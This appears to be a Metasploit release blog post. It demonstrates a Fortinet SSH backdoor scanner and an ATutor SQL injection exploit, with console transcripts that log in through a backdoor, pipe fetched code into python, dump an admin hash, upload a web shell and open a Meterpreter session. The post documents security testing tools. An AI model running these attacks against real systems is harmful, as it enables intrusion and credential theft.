Last updated at Thu, 21 Dec 2023 22:11:31 GMT

Scanning for the Fortinet backdoor with Metasploit

Written by wvu

Metasploit now implements a scanner for the Fortinet backdoor. Curious to see how to use it? Check this out!

wvu@kharak:~/metasploit-framework:master$ ./msfconsole -qL  
msf > use auxiliary/scanner/ssh/fortinet_backdoor   
msf auxiliary(fortinet_backdoor) > set rhosts 417.216.55.0/24  
rhosts => 417.216.55.0/24  
msf auxiliary(fortinet_backdoor) > set threads 100  
threads => 100  
msf auxiliary(fortinet_backdoor) > run  
[*] Scanned 35 of 256 hosts (13% complete)  
[*] Scanned 84 of 256 hosts (32% complete)  
[*] Scanned 90 of 256 hosts (35% complete)  
[+] 417.216.55.69:22 - Logged in as Fortimanager_Access  
[*] Scanned 103 of 256 hosts (40% complete)  
[*] Scanned 136 of 256 hosts (53% complete)  
[*] Scanned 174 of 256 hosts (67% complete)  
[*] Scanned 180 of 256 hosts (70% complete)  
[*] Scanned 205 of 256 hosts (80% complete)  
[*] Scanned 233 of 256 hosts (91% complete)  
[*] Scanned 256 of 256 hosts (100% complete)  
[*] Auxiliary module execution completed  
msf auxiliary(fortinet_backdoor) >   
[1]+ Stopped ./msfconsole -qL  
wvu@kharak:~/metasploit-framework:master$ python <(curl -s 417.216.55.69  
FortiGate-VM64 #   
config Configure object.  
get Get dynamic and system information.  
show Show configuration.  
diagnose Diagnose facility.  
execute Execute static commands.  
exit Exit the CLI.  

Easy as can be.

The module doesn't get sessions yet due to complications with net-ssh, but we're working on it!

Shall we play a game, ATutor?

Written by Bill Webb

Ever wished you could live out your Wargames fantasies, easily changing your grades all while impressing the ladies?  Now you can with the addition of the ATutor 2.2.1 SQL injection module.  This module exploits the vulnerability described in CVE-2016-2555, allowing one to bypass authentication and reach the administrators interface.  While reaching the vulnerability requires one to login to ATutor as a student, remote registration is enabled by default.  Once you have gained access to the admin console, you can do all sorts of fun stuff, such as uploading malicious code ...

msf exploit(atutor_sqli) > check  
[+] The target is vulnerable.  
msf exploit(atutor_sqli) > exploit  
[*] Started reverse TCP handler on   
[*] - Logged in as admin, sending a few test injections...  
[*] - Dumping username and password hash...  
[+] - Got the admin hash: bcbc84567720217d190cab05ac3bf7722f2936ca !  
[*] - Logged in as admin, uploading shell...  
[+] - Shell upload successful!  
[*] Sending stage (33684 bytes) to  
[*] Meterpreter session 1 opened ( -> at 2016-02-29 18:44:11 -0600  
[+] - Deleted ocfw.php  
[+] - Deleted ../../content/module/qee/ocfw.php  
meterpreter >  

... or pulling off their best Matthew Broderick impersonation.

It's almost like it's 1983 again.

(We can't guarantee that the ladies will in fact be impressed ...)

New modules

Exploit modules (3 new)

Auxiliary and post modules (6 new)

Get it

As always, these new features are only an msfupdate away! You can view the changes here: 4.11.10...4.11.14.